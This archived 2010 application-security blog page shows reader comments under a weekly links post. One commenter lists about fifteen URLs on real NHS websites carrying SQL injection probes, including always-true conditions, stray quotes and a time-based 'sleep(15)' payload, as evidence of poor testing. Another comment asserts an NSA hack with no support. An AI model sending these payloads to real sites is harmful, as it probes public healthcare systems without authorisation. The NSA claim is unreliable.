Jeremiah Grossman: Best of Application Security (Friday, Feb. 12)

Friday, February 12, 2010

Best of Application Security (Friday, Feb. 12)

Ten of Application Security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

4 comments:

Martin Hall said...: On Number 3
(Hacker causes DOH site to close)

Maybe we need to close all of the National Health sites.

Every one I checked was Vuln.

http://www.eastmidlandsdeanery.nhs.uk/page.php?id=-1+or+777=777/
http://www.kmpt.nhs.uk/publicsurvey.php?SurveyId=%2715
http://www.londonqarc.nhs.uk/section.php?id=%271'
http://www.croydonchs.nhs.uk/list.html?srch=32txt=Health%20visiting
http://www.jpaget.nhs.uk/news.php?offset=-3
http://www.innovationssoutheast.nhs.uk/events/?event_start_month=%2711
http://www.nycris.nhs.uk/search.php?q=TheTestManager.com&f=%2715
http://www.londonqarc.nhs.uk/display_form.php?form_id=%277&section=40&blank=true
http://www.kingstonhospital.nhs.uk/kh2/kingston_page.php?pageid=75%27
http://www.shine.nhs.uk/services.php?a=2%27
http://www.bromley.nhs.uk/content.php?page=1+and+sleep(15)%23
https://www.eastern.nhs.uk/scripts/foi/informationrequestform.asp?send=no&foiid=
http://www.essafinance.nhs.uk/index/index.php?item_id=89&info_style_size=4
http://www.jpaget.nhs.uk/news.php?offset=-4
http://www.eastmidlandsdeanery.nhs.uk/page.php?id=521http://www.eastmidlandsdeanery.nhs.uk/page.php?id=521

I'm a tester by trade and all of those sites would never have made it past on any of my teams.

Poor testing if any way done at all.

If your testing websites and you only testing for functionality and not security then your not really testing at all.; February 14, 2010 at 8:46 AM
Jeremiah Grossman said...: @Martin, all I can say is "damn." -- no further comment required.; February 14, 2010 at 9:25 AM
Chris Schmidt said...: wow - really?

‘not sufficiently robust to withstand modern day hacking'.

I would hardly call SQLi 'modern day' since it predates the website by at least a few years.

I guess it could be considered modern day if you still consider Dial-up internet access to be bleeding edge.. :); February 14, 2010 at 11:18 AM
IT Ninja said...: btw ,the National Security Agency was recently hacked. Yes hacked! But it was downplayed to the media for obvious shameful reasons. Here’s the link :

http://pinoysecurity.blogspot.com/2010/02/wwwnsagov-hacked.html; February 16, 2010 at 11:41 PM

Post a Comment

BIO

Jeremiah Grossman brings 20+ years of experience in Computer Security and has become one of the most recognizable and world-renowned cybersecurity experts in the industry, coining several of the original hacking terms commonly used around the world today. Early in his career, Jeremiah was known as “The Hacker Yahoo” which led to his role as the company’s Information Security Officer. Jeremiah founded WhiteHat Security (now Synopsis), and served as Chief of Security Strategy for SentinelOne which was the highest-valued cybersecurity IPO in history. Most recently, Jeremiah was the founder & CEO of Bit Discovery, which was acquired by Tenable in 2022. He also serves as a company advisor and board member to several tech startups. In his spare time, Jeremiah does Brazilian Jiu-Jitsu and is passionate about classic cars. He recently opened Toybox, a luxury car club in Boise, Idaho.